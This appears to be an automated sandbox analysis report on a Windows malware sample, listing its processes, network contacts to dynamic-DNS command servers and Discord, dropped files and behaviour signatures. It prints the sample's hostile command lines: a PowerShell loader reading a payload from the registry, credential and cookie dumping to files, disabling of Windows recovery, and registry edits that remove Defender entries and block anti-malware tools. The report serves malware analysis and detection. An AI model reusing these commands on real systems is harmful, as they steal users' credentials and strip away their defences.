| C:\Windows\system32\timeout.exe | timeout 20 |
| C:\Windows\system32\taskeng.exe | taskeng.exe {3BA54D79-45F1-4612-983D-2FA617B33DF7} S-1-5-18:NT AUTHORITY\System:Service: |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)" |
| C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-12656054402070301516-4255555401522191709-4118009271430661657693471369-971391952" |
| C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{b640a9e3-a768-4522-b411-f3fd820d4a48} |
| C:\Windows\system32\taskeng.exe | taskeng.exe {A9057942-B5C4-4631-B462-62F08246B1CD} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1] |
| C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe |
| C:\Windows\SysWOW64\dllhost.exe | C:\Windows\SysWOW64\dllhost.exe /Processid:{f56410db-7eb5-4b3e-a77b-673cdf693e07} |
| C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs" |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c compile.bat |
| C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt" |
| C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs" |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c compile.bat |
| C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "1957198345-102239573611340640-1273495592588059072-68869171511852531341649145162" |
| C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1" |
| C:\Users\Admin\AppData\Local\Temp\splwow64.exe | C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2" |
| C:\Users\Admin\AppData\Local\Temp\hh.exe | C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3" |
| C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs" |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c compile.bat |
| C:\Users\Admin\AppData\Local\Temp\xwizard.exe | C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt" |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" |
| C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-2007663707-1750485760-95921033511188272091101812646368208037425860902750494678" |
| C:\Windows\system32\choice.exe | choice /C Y /N /D Y /T 3 |
| C:\Windows\system32\ReAgentc.exe | reagentc.exe /disable |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\reagentc.exe" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\reagentc.exe" /grant *S-1-5-32-544:F /T /C /Q |
| C:\Windows\system32\takeown.exe | takeown /f "C:\Windows\System32\reagent.dll" |
| C:\Windows\system32\icacls.exe | icacls "C:\Windows\System32\reagent.dll" /grant *S-1-5-32-544:F /T /C /Q |
| C:\Windows\system32\taskkill.exe | taskkill /im "SecurityHealthSystray.exe" /f |
| C:\Windows\system32\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f |
| C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MRT" /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MRT.exe" /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "rkill.exe" /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "rkill32.exe" /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "rkill64.exe" /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "MBSetup.exe" /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "mbam.exe" /f |
| C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "mbar.exe" /f |
| C:\Windows\system32\timeout.exe | timeout 2 |
| C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe |
| C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | stellacy.duckdns.org | udp |
| US | 87.249.134.21:55562 | stellacy.duckdns.org | tcp |
| US | 8.8.8.8:53 | itroublvehacker.gq | udp |
| US | 8.8.8.8:53 | api64.ipify.org | udp |
| US | 104.237.62.213:443 | api64.ipify.org | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | stellacy.ydns.eu | udp |
| SE | 193.138.218.173:55562 | stellacy.ydns.eu | tcp |
| US | 8.8.8.8:53 | stellacy.tk | udp |
| IE | 3.249.173.109:55562 | stellacy.tk | tcp |
| US | 8.8.8.8:53 | stellacy2.duckdns.org | udp |
| SE | 193.138.218.173:55562 | stellacy2.duckdns.org | tcp |
| US | 8.8.8.8:53 | stellacy.duckdns.org | udp |
| US | 87.249.134.21:55562 | stellacy.duckdns.org | tcp |
| SE | 193.138.218.173:55562 | stellacy2.duckdns.org | tcp |
Files
\Users\$77main1.exe
C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat
C:\Users\$77Redownloader.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\Backup.bat
\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
C:\Windows\Tasks\$77svc64.job
C:\Windows\Tasks\$77svc32.job
C:\Users\Admin\AppData\Local\Temp\config
C:\Users\Admin\AppData\Local\Temp\compile.vbs
C:\Users\Admin\AppData\Local\Temp\compile.bat
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt
C:\Users\Admin\AppData\Local\Temp\compile.bat
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
C:\Users\Admin\AppData\Local\Temp\hh.exe
C:\Users\Admin\AppData\Local\Temp\compile.bat
C:\Users\Admin\AppData\Local\Temp\xwizard.exe
C:\Users\Admin\AppData\Local\Temp\xwizard.cfg
C:\Users\Admin\AppData\Local\Temp\bhv3543.tmp
C:\Users\Admin\AppData\Local\Temp\whysosad
C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x86.dll
C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x64.dll
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-07 10:38
Reported
2024-10-07 10:41
Platform
win10v2004-20240802-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2728 created 612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 1252 created 612 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "rkill32.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "mbar.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MRT.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "rkill64.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "mbam.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "rkill.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "MBSetup.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\$77main1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\$77main1.exe | N/A |
| N/A | N/A | C:\Users\$77Redownloader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2728 set thread context of 3480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 1252 set thread context of 4764 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\SysWOW64\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\Tasks\$77svc32.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc32.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File created | C:\Windows\Tasks\$77svc64.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Tasks\$77svc64.job | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\$77Redownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\winhlp32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\xwizard.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\$77main1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\splwow64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\hh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
